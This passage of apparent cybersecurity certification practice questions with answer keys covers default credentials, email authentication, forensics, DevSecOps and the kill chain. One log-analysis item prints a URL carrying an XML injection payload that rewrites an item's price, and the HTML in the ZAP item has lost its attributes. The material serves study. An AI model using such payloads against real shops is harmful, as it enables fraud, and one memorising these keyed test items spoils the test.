D. 10.0.19.121 is under attack from a host at 11.154.12.121
C. 10.0.19.121 is a client accessing an SSH server over port 52497
You just visited an e-commerce website by typing in its URL during a vulnerability assessment. You discovered that an administrative web frontend for the server’s backend application is accessible over the internet. Testing this frontend, you discovered that the default password for the application is accepted. Which of the following recommendations should you make to the website owner to remediate this discovered vulnerability? (Select 3)
A. Conduct a penetration test against the organization’s IP space
B. Require two-factor authentication for access to the application
C. Whitelist all specific IP blocks that use this application
D. Rename the URL to a more obscure name
E. Require an alphanumeric passphrase for the application’s default password
F. Change the username and default password
B. Require two-factor authentication for access to the application
C. Whitelist all specific IP blocks that use this application
F. Change the username and default password
Which of the following provides a cryptographic authentication mechanism to positively identify an organization as the authorized sender of email for a particular domain name?
A. DKIM
B. DMARC
C. SMTP
D. SPF
A. DKIM
You are going to perform a forensic disk image of a macOS laptop. What type of hard drive format should you expect to encounter?
A. exFAT
B. HFS+
C. NTFS
D. FAT32
B. HFS+
Hierarchical File System Plus
macOS doesn’t support FAT32 and exFAT
You are analyzing the SIEM for your company’s e-commerce server when you notice the following URL in the logs of your SIEM:
https://www.diontraining.com/add_to_cart.php?
itemld=5"+perltemPrice="0.00"+quantity="100"+/>
A. SQL injection
B. Session hijacking
C. Buffer overflow
D. XML injection
D. XML injection
XML injection manipulates or compromises the logic of an XML application or service.
You suspect that your server has been the victim of a web-based attack. Which of the following ports would most likely be seen in the logs to indicate the attack’s target?
A. 443
B. 389
C. 21
D. 3389
A. 443
After 9 months of C++ programming, the team at Whammiedyne Systems has released their new software application. Within just 2 weeks of release, though, the security team discovered multiple serious vulnerabilities in the application that must be corrected. To retrofit the source code to include the required security controls will take 2 months of labor at the cost of $100,000. Which development framework should Whammiedyne use in the future to prevent this situation from occurring in other projects?
A. DevOps
B. Waterfall Model
C. DevSecOps
D. Agile Model
C. DevSecOps
Which of the following is the most important feature to consider when designing a system on a chip?
A. Space and power savings
B. Ability to interface with industrial control systems
C. Type of real-time operating system in use
D. Ability to be reconfigured after manufacture
A. Space and power savings
You are a cybersecurity analyst working for an accounting firm that manages the accounting for multiple smaller firms. You have successfully detected an APT operating in your company’s network that appears to have been there for at least 8 months. In conducting a qualitative assessment of the impact, which of the following factors should be most prominently mentioned in your report to your firm’s executives? (Select 2)
A. Downtime
B. Recovery time
C. Data integrity
D. Economic
E. Detection time
C. Data integrity
D. Economic
The Pass Certs Fast corporation has recently been embarrassed by several high profile data breaches. The CIO proposes improving the company’s cybersecurity posture by migrating images of all the current servers and infrastructure into a cloud-based environment. What, if any, is the flaw in moving forward with this approach?
A. This approach only changes the location of the network and not the attack surface of it
B. This is a reasonable approach that will increase the security of the servers and infrastructure
C. The company has already paid for the physical servers and will not fully realize their ROI on them due to the migration
D. This approach assumes that the cloud will provide better security than is currently done on-site
A. This approach only changes the location of the network and not the attack surface of it
You have been asked to scan your company's website using the OWASP ZAP tool. When you perform the scan, you receive the following warning:
“The AUTOCOMPLETE output is not disabled in HTML FORM/INPUT containing password type input. Passwords may be stored in browsers and retrieved.”
You begin to investigate further by reviewing a portion of the HTML code from the website that is listed below:
<form>
Enter your username: <br></br>
<input></input><br></br>
Enter your Password: <br></br>
<input></input><br></br>
<input></input>
</form>
Based on your analysis, what action should you take?
A. You recommend that the system admin disables SSL on the server and implements TLS instead
B. You tell the developer to review their code and implement a bug/code fix
C. You recommend that the system admin pushes out a GPO update to reconfigure the web browsers security settings
D. This is a false positive, and you should implement a scanner exception to ensure you don’t receive this again during your next scan
B. You tell the developer to review their code and implement a bug/code fix
Jack is assessing the likelihood of reconnaissance activities being performed against his organization. Which of the following would best classify the likelihood of a port scan being conducted against his DMZ?
A. None
B. High
C. Medium
D. Low
B. High
An organization utilizes a BYOD policy with its employees. This allows the employees to store sensitive corporate data on their personally owned devices. Which of the following occurred if an employee accidentally left their device in the back of a taxi?
A. Failed data loss prevention
B. Failed deperimeterization management
C. An advanced persistent threat
D. A data breach
B. Failed deperimeterization management
Which of the following attacks would most likely be used to create an inadvertent disclosure of information from an organization’s database?
A. SQL injection
B. Buffer overflow
C. Denial of service
D. Cross-site scripting
A. SQL injection
An organization has hired a cybersecurity analyst to conduct an assessment of their current security posture. The analyst begins by conducting an external assessment against the organization's network to determine what information is exposed to potential external attackers. What technique should the analyst perform first?
A. Enumeration
B. Intranet portal reviews
C. DNS query log reviews
D. Technical control audits
A. Enumeration
Which of the following will an adversary do during the weaponization phase of the Lockheed Martin kill chain? (Select three)
A. Obtain a weaponizer
B. Conduct social media interactions with targeted individuals
C. Select a decoy document to present to the victim
D. Harvest email addresses
E. Select backdoor implant and appropriate command and control infrastructure for operation
F. Compromise the target's servers
A. Obtain weaponizer
C. Select a decoy document to present to the victim
E. Select backdoor implant and appropriate command and control infrastructure for operation
Which of the following vulnerabilities was the MOST critical due to its high potential impact and exploitability?
A. Stagefright
B. Shellshock
C. Logjam
D. Drupalgeddon
B. Shellshock
Which of the following is the difference between an incident summary report and lessons-learned report?
A. Both a lessons learned report and an incident summary report are designed for a technical audience
B. A lessons-learned report is designed for a non-technical audience
C. Both a lessons learned report and an incident summary report are designed for a non-technical audience
D. An incident summary report is designed for a non-technical audience
D. An incident summary report is designed for a non-technical audience
After a sophisticated spear-phishing attack compromised your organization’s financial database, the incident response team engages in a meticulous examination of the event. They aim to preserve and scrutinize digital evidence, uncover the exact method of the breach, and gauge its impact on your organization. What is this meticulous post-incident examination known as?
A. Lessons learned
B. Incident response plan
C. Forensic analysis
D. Root cause analysis
C. Forensic analysis
During an incident response, your team identified that an attacker performed a scan on your network, then delivered malware via a phishing email, which was exploited to install a backdoor on the system. The attacker then executed commands to exfiltrate data. Which framework would BEST represent this attack sequence?
A. Cyber Kill Chain
B. MITRE ATT&CK
C. OWASP Testing Guide
D. Diamond Model of Intrusion Analysis
A. Cyber Kill Chain